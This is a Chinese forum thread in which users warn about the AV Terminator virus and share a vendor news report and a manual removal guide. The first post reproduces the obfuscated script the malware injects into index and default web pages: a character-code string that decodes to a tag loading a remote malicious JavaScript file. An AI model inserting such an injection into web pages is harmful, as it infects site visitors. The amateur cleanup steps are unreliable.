注意：从没人提起过的“AV终结者”的一个行为！！！

孤独飞

今天不幸中了AV终结者，ASP页面被感染，幸亏卡饭们的帮忙最终查出了元凶。
AV终结者，也许是它下载的某些病毒，会遍历硬盘里所有的目录，查找index.asp,default.asp,index.htm,default.htm等一般常用来做首页的文件，然后在下面加上如下代码：
<script>
t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,99,115,46,99,115,107,105,99,107,46,99,110,47,99,115,47,115,99,46,106,115,62,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

利用String.fromCharCode函数，把ASCII转成字符，结果就产生了一个指向带毒网页的语句，怪不得我用雷克图查找.htm或b.js都没有找出原因。

大家注意了，如果遇到AV终结者，一定要注意查看自己的类似文件是否被修改。

xffsfy

XX提醒
PS： 我咋啥都没中过？

l04zw

可能是大部分人的机器上没有类似文件吧，不然也不会这么久没有任发现

HorseLuke

遇到这种情况，可以使用一个网页文件附加代码清除工具（CSI计算机安全资讯网提供）来清除。
下载地址：
http://www.vaid.cn/blog/read.php?9

ljbhs

“AV终结者”专杀工具2 v.4.2

AV终结者挑战反病毒行业　危害赶超熊猫烧香
来源：金山毒霸信息安全网
　　近日，被称为“安全杀手”的AV终结者病毒愈演愈烈，截止6月12日，变种数已达500多个，波及人群超过10万人。金山毒霸反病毒专家戴光剑指出，“AV终结者”病毒破坏过程被精心策划，一旦感染，几乎所有的解决途径均遭破坏，很难清除。　　6月8日，金山毒霸发布紧急预警，“AV终结者”病毒导致大量安全软件无法正常使用，用户系统安全面临严峻威胁；短短三天之后，6月12日，“AV终结者”危害行为变得更加恶劣，杀毒软件被禁用，反病毒网站无法打开，安全模式遭破坏，格式化系统盘后病毒仍无法清除，用户电脑的安全性被大大降低，电脑内的重要信息、机密文件、网络财产等面临严峻威胁。

　　金山毒霸反病毒专家戴光剑表示，“AV终结者”集目前最流行的病毒技术于一身，而且破坏过程经过了严密的“策划”，普通用户一旦感染该病毒，从病毒进入电脑，到实施破坏，四步就可导致用户电脑彻底崩溃：

　　1. 禁用所有杀毒软件以相关安全工具，让用户电脑失去安全保障；

　　2.　破坏安全模式，致使用户根本无法进入安全模式清除病毒；

　　3.　强行关闭带有病毒字样的网页，只要在网页中输入“病毒”相关字样，网页遂被强行关闭，即使是一些安全论坛也无法登陆，用户无法通过网络寻求解决办法；

　　4.　格式化系统盘重装后很容易被再次感染。用户格式化后，只要双击其他盘符，病毒将再次运行。

　　经过“AV终结者”的精心“策划”，用户电脑的安全防御体系被彻底摧毁，安全性几乎为零，而“AV终结者”并未就此罢手，自动连接到某网站，大量下载数百种木马病毒，各类盗号木马、广告木马、风险程序用用户电脑毫无抵抗力的情况下，鱼贯而来，用户的网银、网游、QQ帐号密码以及机密文件都处于极度危险之中。

　　据了解，“AV终结者”变种仍在不断更新，如果不即及时进行查杀，广大用户利益将面临更大威胁。基于“AV终结者”危害的严重性，金山毒霸呼吁所有反病毒厂商对该病毒进行联合绞杀。

　　根据该病毒的传播特点，基于该病毒危害严重，金山毒霸反病毒中心第一时间推出了专杀工具，用户利用专杀工具进行查杀，[立即下载专杀工具]。此外由于遭遇该病毒破坏的电脑无法登陆反病毒网站，用户可到正常电脑或全国各大软件专卖店下载“AV终结者”专杀工具，然后接到中毒电脑中进行查杀。


　　

tracydk

没中过

ljbhs

一个目前任何杀毒软件都头疼的AV终结者，教你手动将他清理



最近本人在电脑上上网，经常不知不觉的中一中很厉害的病毒，杀毒软件根本反应不到



我一般在上网时对电脑的要求还算高，只要电脑反应有点慢，我就会很敏感



这种病毒我还不知道叫什么名字，上网查了一下，叫AV终结者，我给它起了个名字叫AV群隐



光说有专杀，但是中了之后，网页打不开也是无济于事，



因为一但中了这种病毒之后，病毒会在你的机器上产生上千个文件和数个木马



具体中毒的情况是这样的，杀毒软件无法打开，杀毒软件无法安装，浏览器自动关闭，



不显示隐藏文件，一进安全模式就重起，自动在所有磁盘创建autorun.inf文件，



还有一些特性，我就不知道了，自己也没有试过，主要就是以上几种



第一次中这种病毒的时候，是在自己的电脑上，因为盘里有重要的东西，所以我用了很笨的办法



我没有把所有盘都格式化，只是把C盘格式化，然后利用超级DOS工具进入的其他的盘



一个文件一个文件的找，因为是自己的电脑，上面有什么东西都比较熟悉，



所以只要见到没见过的.exe文件，就删，花了几个小时的时间才把其他盘里的病毒删干净



然后再用GHOST恢复一下C盘的数据，就OK了！



后面又中了几次，都是在公司里上班，同事中，我也中，害我给几台机器做了好几次系统



找到方法的那次，因为没有带盘包，没有任何的工具，没办法，为了把机器弄好，只能试下了



下面我就给大家介绍一下这种在普通模式的桌面下，清理这种病毒的方法！



首先我认为比较好的杀毒软件是金山，我做电脑全部都是金山+360安全卫士或再+天网防火墙



但是如果中了这种病毒，再牛B的杀毒软件都成了垃圾，具体方法如下



先用搜索项 搜索autorun.inf，记住要点高级选项，搜索隐藏文件



搜索完毕后，你会看到所有盘下都有这个文件，大家不要急的删除



随便找一个点开属性，记录下其文件所创建的时间！比如2007.06.09 8:30:29记住是创建的时间，不是修改时间



下面要做的就是下载一个工具，一般浏览器不会一下就关闭，有几秒的时间，或有些不关闭



点开一个网站还是够用了，下什么东西呢？打开www.killsoft.cn，打开之后发现是完美卸载的官方



打开立即点右边的立即下载，杀毒软件装不了，但是这个还是可以装的，呵呵，



下载完了之后安装，不过最好是离你中病毒的时间有点距离，新手怕你删错文件



安装成功了，然后打开 WINDOWS搜索，什么也不要写，点：什么时候修改的？指定日期-选择创建日期，



这里一定要记住不要填写当天的日期，要看你电脑的日期，因为病毒可能已经修改了你电脑的日期



然后日期要设成同一天，比如你今天中了病毒，电脑的日期的2007.06.09，那就都设成这个



然后点更多高级选项,把搜索隐藏的选项全部点上！好开始找，找完之后，你会发现有很多文件创建，可能几千的



怎么样分清是病毒创建的文件呢？上面不是让你记录的autorun.inf的创建时间了吗？



是的，在这个时间范围之后到你安装完美卸载的时间里的文件，就是我们要找的病毒文件，当然就算删错了也不会有事，但先别着急删，因为是删不掉的，只能把时间倒乱。



搜索完一般都是列表形式的文件排列，上面有文件的信息，如文件名，文件类型，路径。



然后在信息名称上点右键，钩下创建时间，去掉修改时间，然后，这些所有文件的列表就有



文件名，文件类型，所在位置，创建时间等，几种信息，先不要急的删除



点一下文件类型，找到那些.exe的文件，然后打开任务管理器，找到和你搜索中相同的运行文件



不要将它结束任务，因为那么做也是无济于事，刚才不是下载了完美卸载了吗？


好了，现在我来教大家怎么用这个软件，打开完美卸载，千万别想着用这个软件去杀毒，因为这个杀毒是很弱的，只能杀一些小虫虫！不过其他功能确实能强！
现在点一下“软件卸载”，当然这里面是没有病毒的安装信息的，这就要你自己去找了，刚才搜到的.exe程序里，有俩个程序是在任务管理器里存在的，因为文件可能在不同电脑上名字不一样，在我的一个是q开头的，先叫他520，还有一个是e开头的，就叫741吧。这时候点一下完美卸载中的智能卸载，点开之后有3个选项，选第3个，‘可执行的.EXE文件’。然后选择路径，520的路径可能是C:\Program Files\Common Files\System，选择之后，把520这个病毒的名字复制到上面，点打开----开始分析----分析完了后点智能卸载，完了之后，再点‘顽固文件’，这个很重要，然后再次重复上面的路径动作，选中520这个病毒文件，开始删除，好了，520这个已经是不是到你的回收站了？重复上面的动作，再把741这个病毒一样的放进回收站，清空之后，再把搜索里的那个时间段创建的.EXE文件都删除。
然后再这些搜索的文件要找到一个.dll文件，我这个文件的名字是D开头的，找到之后按照上面的路径，。把它放到完美卸载里，照上面的俩个文件的操作方法把这个文件也放到回收站里，为什么要找这个文件，别问我，我只知道这个是病毒文件，呵呵，不把它删了，其他的.dll文件也删不了。

删了这3个大头之后就一切都比较好办了，之后就是清理工作了，把你刚搜索的到的文件，从病毒创建时间到你安装完美的时间内的文件，或是那个时间段里的文件全部删除，删完了，但还没完全完，这时候我们就要用杀毒软件了，现在就打开你的浏览器吧，看看，是不是能上网了，呵呵，上哪个网，别以为病毒都删了，其实还没有，还有一堆木马没杀呢，找个免费在线杀毒的网，中这个病毒的时候，只要你在浏览器里一打开杀毒，或与之相关的就会自动关闭，不过经过上面的操作之后，你又可以上网了，给大家一个地址，http://www.killsoft.cn/kingsoft/scan.shtml上去之后，看到了吧，是金山的在线杀毒，然后就开始全面的扫描你的电脑吧，现在终于能清理这些木马了，杀完之后，你会发现你的杀毒软件应该都能用了，如果不能用就重新去下载安装吧。或者也可以再下个专杀什么的，现在也是可以用了！也可以找个注册表修复再修复一下，就很完美了，呵呵！
无法显示隐藏文件的话，打开一个记事本，把下面的代码复制都里面

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

"CheckedValue"=dword:00000001

然后保存，选择所以文件，名字为：“显示被隐藏的文件.REG”，O了，双击，可以显示所有文件了

shshgz

刚刚中了，用终结者解决掉了。